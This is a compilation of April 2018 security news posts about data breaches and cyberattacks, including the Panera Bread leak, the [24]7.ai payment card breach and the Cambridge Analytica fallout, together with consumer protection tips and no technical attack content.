The Coinsecure CEO ruled out that the transfer was the result of a hack and accused the CSO, but Dr. Saxena denied any involvement in the case and informed Coinsecure that the funds “were stolen from company’s Bitcoin wallet due to some attack.”

“Our system itself has never been compromised or hacked, and the current issue points towards losses caused during an exercise to extract BTG [Bitcoin Gold] to distribute to our customers,” the Coinsecure team wrote in its statement.

“Our CSO, Dr. Amitabh Saxena, was extracting BTG and he claims that funds have been lost in the process during the extraction of the private keys,” Coinsecure added.

“[he] making a false story to divert [his] attention and might have a role to play in this entire incident.”

The CEO is asking local police to seize Saxena’s passport because he fears that the employee “might fly out of the country soon.”

Pierluigi Paganini

(Security Affairs – Bitcoin, hacking)

The post $3.3 Million stolen from main Coinsecure Bitcoin wallet appeared first on Security Affairs.

Ransomware Was the Most Prevalent Form of Malware in 2017

A recent data breach investigations study revealed that ransomware was the most prevalent variety of malware in 2017.

According to Verizon’s “2018 Data Breach Investigations Report (DBIR),” security professionals spotted cryptolockers in 39 percent of security incidents that involved malware as an attack variety. This attack type was more prevalent than spyware, banking Trojans and other forms of malicious software over the course of the year.

Ransomware in Review

For the report, Verizon analyzed over 53,000 security incidents, including 2,216 data breaches, submitted from contributors in more than five dozen countries. The goal of the study was to identify trends in those events and inform organizations about the threats they’re up against as they plan their defense strategies.

The researchers ranked ransomware as the fifth-most prevalent action variety with 787 incidents, and noted that malware was utilized as a tactic in 30 percent of security events.

Gabe Bassett, senior information security data scientist at Verizon and co-author of the report, said he tracked ransomware’s growth since it first appeared in the 2013 edition of the DBIR. During that span of time, he witnessed ransomware activity double year over year on at least two separate occasions.

“The reason we’re seeing this incredible prevalence is ransomware is a great value proposition for the attacker,” Bassett told TechRepublic. “They don’t have to do a lot of the complex work. They just drop a piece of malware and then let it run.”

Ransomware activity also grew because of its flexibility, allowing cybercriminals to launch campaigns against targets that are more lucrative than users’ personal devices. In fact, Verizon noted a rise in ransomware operations targeting enterprises’ file systems and databases.

An Industry Perspective

Ransomware was more prevalent in some industries than others. Healthcare came in at the top, with cryptolockers accounting for 85 percent of all malware varieties over the course of the year. The May 2017 outbreak of WannaCry, which claimed 34 percent of the U.K.’s National Health Service (NHS) hospital trusts as victims, according to the U.K. Department of Health and Social Care, likely helped drive up this figure.

But Bassett and his fellow researchers revealed that number might misrepresent the realities of data protection in the healthcare sector. The Verizon report noted that medical organizations are bound by federal regulations to report ransomware attacks as data breaches and not instances of data risk. Therefore, it’s impossible to know whether hospitals and other healthcare centers are more susceptible to ransomware than organizations in other industries or if higher reporting standards are to blame.

The report’s authors advised organizations to take certain steps to protect themselves against data breaches, including implementing two-factor authentication (2FA), patching software vulnerabilities and conducting ongoing security awareness training with employees.

The post Ransomware Was the Most Prevalent Form of Malware in 2017 appeared first on Security Intelligence.

2.6 billion records were stolen, lost or exposed worldwide in 2017

Gemalto released the latest findings of the Breach Level Index, revealing that 2.6 billion records were stolen, lost or exposed worldwide in 2017, an 88% increase from 2016. While data breach incidents decreased by 11%, 2017 was the first year publicly disclosed breaches surpassed more than two billion compromised data records since the Breach Level Index began tracking data breaches in 2013. Over the past five years, nearly 10 billion records have been lost, stolen … More

The post 2.6 billion records were stolen, lost or exposed worldwide in 2017 appeared first on Help Net Security.

U.S. Appeals Court Says Barnes & Noble Data Breach Victims Can Seek Damages

A U.S. federal appeals court has ruled that victims of a payment card data breach at Barnes & Noble can seek damages against the national bookseller. According to Reuters, the decision came on 11 April when the 7th U.S. Circuit Court of Appeals in Chicago said that Heather Dieffenbach of California and Susan Winstead of […]… Read More

The post U.S. Appeals Court Says Barnes & Noble Data Breach Victims Can Seek Damages appeared first on The State of Security.

How to Comply with GDPR

In a little over a month – on May 25, to be precise – the EU’s General Data Protection Regulation (GDPR) will take effect, and if your company is not

The post How to Comply with GDPR appeared first on The Cyber Security Place.

Service Provider [24]7.ai Breached, Leaking Customer Data from Delta Airlines, Sears, Kmart, and Best Buy

A huge part of modern-day customer service is the chat functionality, which allows customers to converse easily with representatives of the organization in order to find a solution to their problem. This chat functionality is often a service offered by a third-party provider. And just last week, one of these service providers, [24]7.ai, reported that an unspecified cyberattack affected online payment data collected by a “small number of our client companies.” A few of these companies include Delta Airlines, Sears, Kmart, and Best Buy.

The breach was the result of an unspecified malware attack on the service’s chat tool, which occurred between Sept. 26 and Oct. 12, 2017. The malware permitted cybercriminals to obtain unauthorized access to customer data, including payment card numbers, CVV numbers, and expiration dates, in addition to customers’ names and addresses.

Delta Airlines, Sears, Kmart, and Best Buy have not yet determined how many customers have been impacted so far, but the total is believed to run into the hundreds of thousands. So, for those who have been affected – what are the next steps? Start by following these security tips:

  • Place a Fraud Alert. If you know your data has been compromised, place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report, so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account. Then, make sure you correct your credit report by filing a dispute with each of the three credit bureaus.
  • Freeze Your Credit. This allows you to seal your credit reports so no one else can take out new accounts or loans in your name. You can do this without impacting your existing lines of credit, such as credit cards. If you want to apply for services or open new accounts, you can temporarily “unfreeze” your credit using a personal identification code only you have.
  • Consider an identity theft protection solution. With these breaches, consumers are faced with the possibility of identity theft. McAfee Identity Theft Protection allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Service Provider [24]7.ai Breached, Leaking Customer Data from Delta Airlines, Sears, Kmart, and Best Buy appeared first on McAfee Blogs.

Ransomware incidents double, threatening companies of all sizes

Ransomware is the most common malware used when it comes to breaches, according to Verizon’s 2018 Data Breach Investigations Report. Verizon’s 2018 Data Breach Investigations Report (DBIR) is out, and

The post Ransomware incidents double, threatening companies of all sizes appeared first on The Cyber Security Place.

Top VEVO Music videos Including ‘Despacito’ defaced by hackers

Some of the most popular VEVO music videos on YouTube, including the world’s most popular video ‘Despacito’, have been hacked by a duo calling themselves Prosox and Kuroi’SH.

Some of the most popular music videos on YouTube, including the world’s most popular YouTube video ‘Despacito’, have been hacked.

Popular videos of pop stars like Shakira, Drake, Selena Gomez, Adele, Taylor Swift, and Calvin Harris were replaced by hackers who spread the message “Free Palestine.”

Despacito, Luis Fonsi’s mega-hit that has been watched five billion times, was replaced by an image of a group of armed men dressed in hooded sweatshirts that appeared to come from the Spanish series “Money Heist.”

The videos were hacked by a duo calling themselves Prosox and Kuroi’SH.

All the hacked videos were on singers’ accounts belonging to the VEVO platform, which is owned by a group of some of the biggest music corporations.

According to YouTube, the problem affected Vevo rather than its own platform.

“After seeing unusual upload activity on a handful of Vevo channels, we worked quickly with our partner to disable access while they investigate the issue,” a YouTube spokesperson said.

Vevo confirmed a security breach on its systems.

“We are working to reinstate all videos affected and our catalog to be restored to full working order. We are continuing to investigate the source of the breach,” it said in a statement.

The alleged hacker @ProsoxW3b started posting several tweets, first saying he had hacked for fun and not for profit.


Pierluigi Paganini

(Security Affairs – Despacito Hacked, VEVO)

The post Top VEVO Music videos Including ‘Despacito’ defaced by hackers appeared first on Security Affairs.

Cybersecurity: How Do You Build a Transformational Dynamic?

At the end of a keynote speech I gave at the excellent CIO WaterCooler LIVE! Event in London on 28th September 2017 on security organization, governance and creating the dynamics

The post Cybersecurity: How Do You Build a Transformational Dynamic? appeared first on The Cyber Security Place.

Sodexo Filmology data breach – Users need to cancel their credit cards

Sodexo, a food services and facilities management company, notified a number of customers that it was the victim of a targeted attack on its cinema vouchers platform Sodexo Filmology.

Sodexo, a food services and facilities management company, notified a number of customers that it was the victim of a targeted attack on its cinema vouchers platform, Filmology, and it is urging them to cancel their credit cards.

The service rewards UK employees with discounted cinema tickets. The website was taken down in response to the incident “to eliminate any further potential risk” to consumers and to protect their data.


Sodexo Filmology reported the incident to the Information Commissioner’s Office and hired a specialist forensic investigation team.

“We would advise all employees who have used the site between 19th March-3rd April to cancel their payment cards and check their payment card statements,” reads the data breach notification issued by Sodexo Filmology.

“These incidents have been caused by a targeted attack on the system we use to host our Cinema Benefits platform, despite having put in place a number of preventative measures with CREST-approved security specialists.”

“We sincerely apologise for any inconvenience this has caused you and are doing all that we can to provide access to your benefits via alternative means. We will share more information on this with you, or your provider, in the coming days.”

A quick search online shows that the attack had been going on for several months: several employees reported fraudulent activity on the Money Saving Expert forum in February.

“After speaking to Filmology to ask exactly what had happened, I was informed that my bank details were stolen from the payment page and that the incident has been reported to the ICO. The hack on the payment page was carried out over 2 months and involved many accounts.” wrote the user Chris.

Pierluigi Paganini

(Security Affairs – Sodexo Filmology, data breach)

The post Sodexo Filmology data breach – Users need to cancel their credit cards appeared first on Security Affairs.

One-Fifth of Open-Source Serverless Apps Have Critical Vulnerabilities

More than 20% of open-source serverless applications contain critical security vulnerabilities, according to an audit by PureSec. An evaluation of 1,000 open-source serverless projects revealed that 21% of them contained

The post One-Fifth of Open-Source Serverless Apps Have Critical Vulnerabilities appeared first on The Cyber Security Place.

Data of 130,000 Finnish users exposed in the third largest data breach ever to happen in the country

Personal information belonging to more than 130,000 Finnish citizens has been compromised in the third largest data breach ever to happen in the country.

The data breach affected a website maintained by the New Business Center in Helsinki (“Helsingin Uusyrityskeskus”), a company that provides business advice to entrepreneurs.

“Data batches have overwritten username and password for over 130,000 users. The violation occurred on an open website for business ideas (liiketoimintasuunnitelma.com).” reported the local media Svenska.

After the discovery of the data breach on 3rd April, the New Business Center in Helsinki took down the affected website.

The bad news for the Finnish citizens is that the passwords stored on the website were in plaintext.

The Finnish Communications Regulatory Authority (FICORA) is warning users of a massive data breach.

“About 130,000 user accounts and plaintext passwords have been revealed. Other confidential information may also have been disclosed. Due to the number of user accounts exposed, this is Finland’s third largest data breach.” states the advisory published by FICORA.

“We are very sorry for all the people who have been subjected to crime and who may be affected by mental or financial disadvantages. Unfortunately, we are not yet able to know exactly how many people are and what information this information breaks. We have filed an offense report, and the parties do not need to report to the police separately,” said Jarmo Hyökyvaara, Chairman of the Board of the New Business Center of Helsinki.

“The maintenance and security of our service was the responsibility of our subcontractor, our long-term partner. Unfortunately, the security of the service has not been enough to prevent this kind of attack. This is, in part, our mistake, and as a subscriber and owner of the service we are responsible for this.”


The New Business Center in Helsinki added that detailed information about its users was not exposed because it was stored on a different system, which was not affected by the data breach.

The company reported the security breach to law enforcement that is investigating the case.

Once the website is back online, users are recommended to change their passwords immediately. I also suggest changing the passwords on any other online service for which the users reused the same credentials.

Pierluigi Paganini

(Security Affairs – New Business Center in Helsinki, data breach)

The post Data of 130,000 Finnish users exposed in the third largest data breach ever to happen in the country appeared first on Security Affairs.

Finland’s 3rd Largest Data Breach Exposes 130,000 Users’ Plaintext Passwords

Over 130,000 Finnish citizens have had their credentials compromised in what appears to be third largest data breach ever faced by the country, local media reports. Finnish Communications Regulatory Authority (FICORA) is warning users of a large-scale data breach in a website maintained by the New Business Center in Helsinki ("Helsingin Uusyrityskeskus"), a company that provides business

Delta and Sears suffer data breach, credit card information compromised

US-based Delta Air Lines and Sears Holdings, the owners of Sears and Kmart, have announced that the breach suffered by chatbot company [24]7.ai has resulted in the compromise of credit card information of its customers. According to a statement by [24]7.ai, which provides online support services to the two companies, the incident began on September 26 and was discovered and contained on October 12, 2017. Sears Holdings says that the incident involved unauthorized access to … More

The post Delta and Sears suffer data breach, credit card information compromised appeared first on Help Net Security.

Nearly Half of Organizations Targeted Again Within a Year of Suffering a ‘Significant’ Cyberattack, Report Reveals

Nearly half of organizations that suffered a “significant” digital attack fell victim to bad actors again within a year’s time, a new security trends report revealed.

According to Mandiant’s “M-Trends 2018” report, 49 percent of managed detection and response customers that remediated a large-scale attack suffered an incident from the same or a similarly motivated threat group within one year. The initial assaults consisted of data theft, credential harvesting and spear phishing, among other techniques.

Unpacking Repeat Cyberattack Trends

Mandiant admitted to not having looked at recompromise figures since it released its “M-Trends 2013” study five years ago. That report found that 38 percent of clients had suffered another attack after successful remediation.

The number of follow-up attacks was somewhat higher in 2017: 56 percent of customers weathered at least one significant attack from the same threat group or one like it. At the same time, the vast majority (86 percent) of organizations that remediated more than one significant cyberattack hosted more than one unique bad actor in their IT environment.

Some regional differences were apparent over the course of the year. Less than half of customers in the Americas and Europe, Middle East and Africa (EMEA) experienced another attack of consequence and/or multiple threat actors. By contrast, 91 percent of Asia-Pacific (APAC) clients dealt with a subsequent campaign, while 82 percent of organizations from that region suffered a significant attack from multiple groups.

The Good News and Bad News About Dwell Time

Dwell time, or the average number of days during which attackers lurked in a victim’s network prior to detection, increased across several regions in 2017, according to the report. The APAC average increased nearly three times, from 172 days to 489 days. The EMEA dwell time growth was more modest at 40 percent, from 106 days to 175 days.

Stuart McKenzie, vice president of Mandiant at FireEye, expressed disappointment in the growth of the median EMEA dwell time but noted that it’s not all bad news.

“On the positive side, we’ve seen a growing number of historic threats uncovered this year that have been active for several hundred days,” McKenzie said, as quoted by Infosecurity Magazine. “Detecting these long-lasting attacks is obviously a positive development, but it increases the dwell time statistic.”

During the same survey period, the dwell time for the Americas decreased from 99 days to 75.5 days. The average across all regions rose slightly from 99 days to 101 days.

Looking Ahead

In the report, Mandiant shared its prediction that foreign digital espionage groups will continue to prey upon U.S. companies and service providers in 2017. It also predicted that bad actors will target the software supply chain to spy on developers and software-makers over the course of the year.

The post Nearly Half of Organizations Targeted Again Within a Year of Suffering a ‘Significant’ Cyberattack, Report Reveals appeared first on Security Intelligence.

100% of Web Apps Contain Vulnerabilities

A totality – a full 100% – of web applications are vulnerable to hackers. According to Trustwave’s 2018 Global Security Report, derived from the analysis of billions of logged security and

The post 100% of Web Apps Contain Vulnerabilities appeared first on The Cyber Security Place.

[24]7.ai Payment Card Breach affected major firms, including Best Buy, After Delta Air Lines and Sears Holdings

A payment card breach suffered by [24]7.ai between September 26 and October 12, 2017, is impacting major firms, including Best Buy, after Delta Air Lines and Sears Holdings.

Another day, another data breach: while media are reporting the security breach suffered by Delta Air Lines and Sears Holdings due to the [24]7.ai payment card breach, Best Buy has also confirmed that it was impacted by the incident.

Best Buy offers chat services for customers via their phone or computer, while [24]7.ai provides online services to businesses in different industries, including Delta Air Lines and Sears Holdings; this means that other firms could have been impacted.

Best Buy announced it will notify affected customers and offer them free credit monitoring.

At the time of writing there is no news about the extent of the payment card breach; Best Buy pointed out that only a small fraction of its online customers could have been impacted by the [24]7.ai hack.

“We, like many businesses, use a third-party for the technology behind this service and that company, [24]7.ai, told us recently that they were the victim of a cyber intrusion. Their information suggests that the dates for this illegal intrusion were between Sept. 27 and Oct. 12, 2017. [24]7.ai has indicated that customer payment information may have been compromised during that time and, if that were the case, then a number of Best Buy customers would have had their payment information compromised, as well.” reads the security advisory published by Best Buy.

“As best we can tell, only a small fraction of our overall online customer population could have been caught up in this [24]7.ai incident, whether or not they used the chat function.”


Delta published a security advisory to notify its customers. The airline speculates that attackers infected [24]7.ai systems with malware that was able to siphon payment card data entered on websites that use the [24]7.ai chat software. It seems that customers of the affected firms may be impacted even if they have not directly used the chat functionality.

The intrusion occurred between September 26 and October 12, 2017.

“We understand malware present in [24]7.ai’s software between Sept. 26 and Oct. 12, 2017, made unauthorized access possible for the following fields of information when manually completing a payment card purchase on any page of the delta.com desktop platform during the same timeframe: name, address, payment card number, CVV number, and expiration date.” reads the advisory published by Delta Air Lines.

“No other customer personal information, such as passport, government ID, security or SkyMiles information was impacted.”

According to Delta, hundreds of thousands of customers may have been impacted by the payment card breach.

Sears Holdings explained that the payment card breach has impacted the credit card information of less than 100,000 customers.

Both Sears and Delta Air Lines were notified by [24]7.ai in mid-March, although the incident occurred in 2017.

Pierluigi Paganini

(Security Affairs – [24]7.ai, Best Buy)

The post [24]7.ai Payment Card Breach affected major firms, including Best Buy, After Delta Air Lines and Sears Holdings appeared first on Security Affairs.

Facebook admits public data of its 2.2 billion users has been compromised

Facebook dropped another bombshell on its users by admitting that all of its 2.2 billion users should assume malicious third-party scrapers have compromised their public profile information. On Wednesday, Facebook CEO Mark Zuckerberg revealed that "malicious actors" took advantage of "Search" tools on its platform to discover the identities and collect information on most of its 2 billion

Smashing Security #072: Why are firms so cr*p with our private data?


Grindr, MyFitnessPal, and Panera Bread. They’ve all had data breach scares of varying degrees this week. Some handled the security breaches well, some didn’t. We took a look at how well different firms are respecting your data privacy.

All this and more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

Security Affairs: Facebook: Cambridge Analytica scandal affected 87 Million users

Facebook revealed on Wednesday that 87 million users have been affected by the Cambridge Analytica case, far more than the 50 million users initially thought.

The social network giant recently unveiled clearer terms of service to ensure transparency to its users about data sharing.

Facebook’s chief technology officer Mike Schroepfer provided further details on the case, including new estimations for the number of affected users.

“In total, we believe the Facebook information of up to 87 million people — mostly in the US — may have been improperly shared with Cambridge Analytica,” Schroepfer said.

The CTO also explained how Facebook is implementing new privacy tools for its users that would be available by next week.

“People will also be able to remove apps that they no longer want. As part of this process we will also tell people if their information may have been improperly shared with Cambridge Analytica,” he added.

“Overall, we believe these changes will better protect people’s information while still enabling developers to create useful experiences.”


Next week, on April 11, Facebook founder Mark Zuckerberg will appear before Congress to address privacy issues.

The hearing will “be an important opportunity to shed light on critical consumer data privacy issues and help all Americans better understand what happens to their personal information online,” said the committee’s Republican chairman Greg Walden and ranking Democrat Frank Pallone in a statement.

“We appreciate Mr. Zuckerberg’s willingness to testify before the committee, and we look forward to him answering our questions.”

The situation for Facebook could get worse after these latest revelations; a few days ago Zuckerberg said it would take “a few years” to fix the problems uncovered by the revelations on data misuse.

Zuckerberg tried to reinforce his company’s positive image, maintaining that one of the biggest errors he made was that Facebook is “idealistic.”

“Well, I don’t think it’s going to take 20 years. I think the basic point that you’re getting at is that we’re really idealistic. When we started, we thought about how good it would be if people could connect, if everyone had a voice. Frankly, we didn’t spend enough time investing in, or thinking through, some of the downside uses of the tools. So for the first 10 years of the company, everyone was just focused on the positive.” Zuckerberg told Vox.com

“I think now people are appropriately focused on some of the risks and downsides as well. And I think we were too slow in investing enough in that. It’s not like we did nothing. I mean, at the beginning of last year, I think we had 10,000 people working on security. But by the end of this year, we’re going to have 20,000 people working on security.” 

In response to the Cambridge Analytica case, Facebook deleted dozens of accounts linked to Russia that were used to spread propaganda.

Facebook announced that it had removed 70 Facebook accounts, 65 Instagram accounts and 138 Facebook pages controlled by the Russia-based Internet Research Agency (IRA), also known as the Russian troll farm because of its misinformation campaigns.

The unit “has repeatedly used complex networks of inauthentic accounts to deceive and manipulate people who use Facebook, including before, during and after the 2016 US presidential elections,” explained Facebook chief security officer Alex Stamos.

Zuckerberg added that the Russian agency“has been using complex networks of fake accounts to deceive people.”

“While we respect people and governments sharing political views on Facebook, we do not allow them to set up fake accounts to do this. When an organization does this repeatedly, we take down all of their pages, including ones that may not be fake themselves.”

Pierluigi Paganini

(Security Affairs – Cambridge Analytica, Facebook)

The post Facebook: Cambridge Analytica scandal affected 87 Million users appeared first on Security Affairs.



Security Affairs

Facebook: Cambridge Analytica scandal affected 87 Million users

Facebook revealed on Wednesday that 87 million users have been affected by the Cambridge Analytica case, much more than 50 million users initially thought.

The social network giant recently unveiled clearer terms of service to ensure transparency to its users about data sharing.

Facebook’s chief technology officer Mike Schroepfer provided further details on the case, including new estimations for the number of affected users.

“In total, we believe the Facebook information of up to 87 million people — mostly in the US — may have been improperly shared with Cambridge Analytica,” Schroepfer said.

The CTO also explained how Facebook is implementing new privacy tools for its users that would be available by next week.

“People will also be able to remove apps that they no longer want. As part of this process we will also tell people if their information may have been improperly shared with Cambridge Analytica,” he added.

“Overall, we believe these changes will better protect people’s information while still enabling developers to create useful experiences.”


Next week, on April 11, Facebook founder Mark Zuckerberg is due to appear before Congress to address privacy issues.

The hearing will “be an important opportunity to shed light on critical consumer data privacy issues and help all Americans better understand what happens to their personal information online,” said the committee’s Republican chairman Greg Walden and ranking Democrat Frank Pallone in a statement.

“We appreciate Mr. Zuckerberg’s willingness to testify before the committee, and we look forward to him answering our questions.”

The situation for Facebook could get worse after these latest revelations; a few days ago Zuckerberg said it would take “a few years” to fix the problems uncovered by the revelations on data misuse.

Zuckerberg tried to reinforce his firm’s positive image, maintaining that one of the biggest errors he made was that Facebook is “idealistic”:

“Well, I don’t think it’s going to take 20 years. I think the basic point that you’re getting at is that we’re really idealistic. When we started, we thought about how good it would be if people could connect, if everyone had a voice. Frankly, we didn’t spend enough time investing in, or thinking through, some of the downside uses of the tools. So for the first 10 years of the company, everyone was just focused on the positive,” Zuckerberg told Vox.com.

“I think now people are appropriately focused on some of the risks and downsides as well. And I think we were too slow in investing enough in that. It’s not like we did nothing. I mean, at the beginning of last year, I think we had 10,000 people working on security. But by the end of this year, we’re going to have 20,000 people working on security.” 

In response to the Cambridge Analytica case, Facebook deleted dozens of accounts linked to Russia that were used to spread propaganda.

Facebook announced it had removed 70 Facebook accounts, 65 Instagram accounts and 138 Facebook pages controlled by the Russia-based Internet Research Agency (IRA), also known as the Russian troll farm because of its misinformation campaigns.

The unit “has repeatedly used complex networks of inauthentic accounts to deceive and manipulate people who use Facebook, including before, during and after the 2016 US presidential elections,” explained Facebook chief security officer Alex Stamos.

Zuckerberg added that the Russian agency “has been using complex networks of fake accounts to deceive people.”

“While we respect people and governments sharing political views on Facebook, we do not allow them to set up fake accounts to do this. When an organization does this repeatedly, we take down all of their pages, including ones that may not be fake themselves.”

Pierluigi Paganini

(Security Affairs – Cambridge Analytica, Facebook)

The post Facebook: Cambridge Analytica scandal affected 87 Million users appeared first on Security Affairs.

Cyber Security Roundup for March 2018

In the wake of the global political fallout over the Salisbury nerve agent attack, there are reports of a growing threat of Russian state or Russian state-affiliated hacking groups conducting cyber attack reprisals against UK organisations. Government officials have directly warned bosses at electricity, gas and water firms, Whitehall departments and NHS hospitals to prepare for a state-sponsored cyber assault.


Large-scale data breaches were disclosed with Under Armour’s Fitness App MyFitnessPal (1.5 million personal records compromised), Orbitz (880k payment cards at risk), and at a Walmart partner (1.3 million personal records compromised). The latter was caused when an AWS S3 bucket holding a Walmart database was left with open access, which isn't the first time a cloud service misconfiguration has caused a major data breach.

TalkTalk were warned about their website’s poor security after a hacker known as 'B' disclosed a cross-site scripting vulnerability on the talktalk.co.uk website to Sky News. TalkTalk was given a record £400,000 fine by the Information Commissioner's Office following a major website breach in October 2015, in which 157,000 customer details were stolen. The company was also told to "be more diligent and more vigilant” and was fined a further £100,000 after data belonging to 21,000 customers was exposed to "rogue" staff at an Indian call centre.

GitHub survived the largest DDoS attack ever recorded, which peaked at a massive 1.35 terabytes of data per second, thanks to Akamai DDoS protection.

UK schools were warned they are soft targets for cybercriminals; experts believe many schools are ill-equipped to prevent cyber thefts, with sensitive data such as children’s medical records said to be lucrative on the dark web. A number of security incidents involving UK schools have been disclosed in recent months.

Gwent Police are facing scrutiny by the Information Commissioner's Office for not informing 450 people that hackers may have accessed their personal information, after discovering the breach over a year ago.

A hacker alleged to be behind a gang that ran the Carbanak and Cobalt bank-targeting malware has been arrested. The gang is reported to be responsible for the theft of up to a billion euros through bank transfers and from cash machines, from over 100 banks since 2013.


How safe is your personal information?

Another day, another data breach. Recent news about cybercriminals obtaining more than 5 million credit card numbers from high-end U.S. retailers joined a series of major hacks and online data breaches. Unfortunately, the frequency of attacks on Americans’ personal information has fostered a feeling of inevitability. In fact, according to results released today from a telephone survey conducted by The Harris Poll for the American Institute of CPAs (AICPA) of 1,006 American adults in the … More

The post How safe is your personal information? appeared first on Help Net Security.

Panera Bread left millions of customer records exposed online for months

The website belonging to the Panera Bread restaurant chain, Panerabread.com, exposed personal information in plain text for months.

The company has more than 2,100 retail locations in the United States and Canada; its customers can order food online for pickup in stores or for delivery.

Panera Bread left the data exposed for at least eight months after the company was first notified of the leak.

On Monday, the popular security expert Brian Krebs reported a bug in Panera’s website that left millions of customer records exposed in plain text.

Exposed data included names, email addresses, physical addresses, birthdays, and the last four digits of customers’ credit card numbers.

The company also exposed customers’ Panera loyalty card numbers, which scammers could use to spend prepaid balances or to steal value from Panera customer loyalty accounts.


The most disconcerting aspect of the story is that the issue was first reported to Panera Bread by the security researcher Dylan Houlihan on August 2, 2017.

At first the IT staff did not acknowledge the flaw; after further investigation, the director of information technology, Mike Gustavison, told the researcher that the issue had been fixed.

Houlihan verified that the issue was not fixed and on April 2nd reported it to Brian Krebs.

“Panerabread.com, the Web site for the American chain of bakery-cafe fast casual restaurants by the same name, leaked millions of customer records — including names, email and physical addresses, birthdays and the last four digits of the customer’s credit card number — for at least eight months before it was yanked offline earlier today, KrebsOnSecurity has learned,” states the blog post published by Krebs.

This incident is disconcerting in many respects, such as the company’s response and the way it managed customers’ data.

Only after Brian Krebs contacted Panera Bread did the company take the website offline.

“It is not clear yet exactly how many Panera customer records may have been exposed by the company’s leaky Web site, but incremental customer numbers indexed by the site suggest that number may be higher than seven million.” continues Krebs.

“It’s also unclear whether any Panera customer account passwords may have been impacted.”

Panera told Fox Business that the data leak affected only about 10,000 records, but experts at Hold Security estimated that the number of affected accounts is approximately 37 million.

In a written statement, Panera declared it had fixed the problem within less than two hours of being notified by Brian Krebs, but the expert rightly pointed out that Panera did not explain why it took eight months to fix the issue after Houlihan reported it.

Pierluigi Paganini

(Security Affairs – Panera Bread, Data Leak)

The post Panera Bread left millions of customer records exposed online for months appeared first on Security Affairs.

Panerabread.com breach could have impacted millions

Customers who signed up for a Panerabread.com account in order to order fast-casual baked goods may want to guard their dough. Security researcher Brian Krebs reported yesterday that the website for the bakery chain leaked millions of customer records, including names, emails, physical addresses, birthdays, and the last four digits of customers’ credit card numbers.

Until Monday, millions of customer data points were accessible on the site as plain text—an oversight that Krebs maintains left data exposed for at least eight months. While Panera was contacted by security researcher Dylan Houlihan back in August 2017 about the leak, it appears they did not take action to fix it, despite reassurances they were working on a resolution.

Once Krebs notified Panera about the breach, the company took its website offline for a brief period of time. When the site came back online, the customer data was no longer available.

Panera issued statements to the press that they moved to fix the breach hours after Krebs reached out to them, though they didn’t address the eight-month gap in action from their first notification. In addition, they stated that only 10,000 customer records were exposed, though researcher HoldSecurity claims it’s more like 37 million.

While this story is still developing, we urge our readers to take necessary precautions to protect their data. An unprecedented season of breaches in 2017 gave way to more breach discoveries in early 2018, with companies such as Orbitz, Lord & Taylor/Saks Fifth Avenue, and MyFitnessPal collectively exposing more than 155 million users.

Recognize that while the flood of data breaches in itself is alarming, we still haven’t seen the full potential for the consequences of giving such valuable data freely to the black market. As tax season comes to a close, for example, we may be poised for a deluge of fraudulent claims and identity theft as criminals try to cash in on their data. Because of this, we suggest taking similar steps as after the Equifax breach, which includes monitoring credit reports, staying on high alert for email, phone, or text scams, and enabling alerts on your accounts.

The more we see infringements of the size and proportion of the Panerabread.com breach, the more we caution users to just assume their data has been compromised. Right now, the best we can do—until companies buckle down harder on security and privacy protocols—is to caution everyone to protect their data from being used to harm them.

Stay safe, everyone.

The post Panerabread.com breach could have impacted millions appeared first on Malwarebytes Labs.

Hackers steal payment card data of 5 million Saks, Lord & Taylor customers

Hackers have apparently managed to compromise the cash register systems at Saks Fifth Avenue and Lord & Taylor stores in the US and Canada, and have stolen payment card data of some five million customers, a cybersecurity research firm has revealed on Sunday. What happened? “On March 28, 2018, a notorious hacking JokerStash syndicate, also known as Fin7 announced the latest breach of yet another major corporation, with more than five million stolen payment cards … More

The post Hackers steal payment card data of 5 million Saks, Lord & Taylor customers appeared first on Help Net Security.

Panera Bread’s half-baked security

We’ve heard it all before. XYZ Company “takes your data security very seriously.”

Most commonly you’ll hear these words just after a company has suffered an embarrassing data breach, perhaps having carelessly exposed the personal information of innocent customers onto the net or had a database stolen by hackers.

The truth is that it’s a brave organisation which promises it will never suffer a serious security incident. Accidents can happen, human weaknesses can leave open vulnerabilities which hackers may be able to exploit, partners who work alongside your company may have had their own security fail which impacted your business.

In these instances, the only way to recover your customers’ trust and retrieve your company’s reputation from being tarnished too much is to respond appropriately to the incident. Often, in fact, the response to a security breach will be more critical to your company’s brand than the incident itself.

And, if you want an example of a company that has got it massively wrong, look no further than Panera Bread, the North American chain of over 2000 bakery cafés.

If you visit Panera Bread’s website today, you won’t find the usual collection of sandwiches, soups, salads, and sausage rolls. Instead you’ll probably see a message like this:

Panera Bread’s website is down. In fact, it’s the second time it’s been down in the last couple of days. Let me explain why…

In August 2017, a security researcher called Dylan Houlihan privately informed Panera Bread of a serious security vulnerability on the delivery.panerabread.com website, which meant that details of any signed-up customers’ full names, email addresses, phone numbers, and the last four digits of their saved credit card numbers could be scooped up.

A member of Panera Bread’s information security team responded to Houlihan, seemingly skeptical of the report – believing it to be a scammy sales pitch.

After a few days and some to-and-fro (which you can read on Houlihan’s blog post), Panera Bread confirmed it was working on resolving the issue.

That was back in August 2017.

As each month passes, Houlihan investigates whether the Panera Bread security vulnerability still exists – and, sadly, it does.

And so, eight months later and frustrated by the lack of response, he informs security blogger Brian Krebs who publicly reveals that millions of customer records are at risk.

Before publishing details of the problem, Krebs spoke to Panera Bread’s CIO John Meister, and the website was soon afterwards briefly taken down for “essential system maintenance”.

Krebs, no doubt, assumed that the problem was being resolved. But no explanation was made as to why no fix was put in place back in August 2017, when they were first informed of the problem by Houlihan.

And if you think that’s bad, things get worse…

Panera Bread told Fox News that “fewer than 10,000 consumers have been potentially affected by this issue” and that “this issue is resolved”.

However, within minutes of that claim it became apparent that the same vulnerability was *still* present on the website – and that the number of customer records exposed may total over 37 million.

And that’s why Panera Bread’s website is down again.

Let’s hope it is taking data security seriously now. Although wouldn’t it have been much better if the company had taken decisive action when the issue was first reported to them eight months ago?

First 5 Steps When Faced with a Data Breach

For the average person or company, experiencing a data breach, or any kind of electronic security incident, can be a lot like a car accident. It’s disorienting. It’s confusing. You’re not entirely sure what to do next.

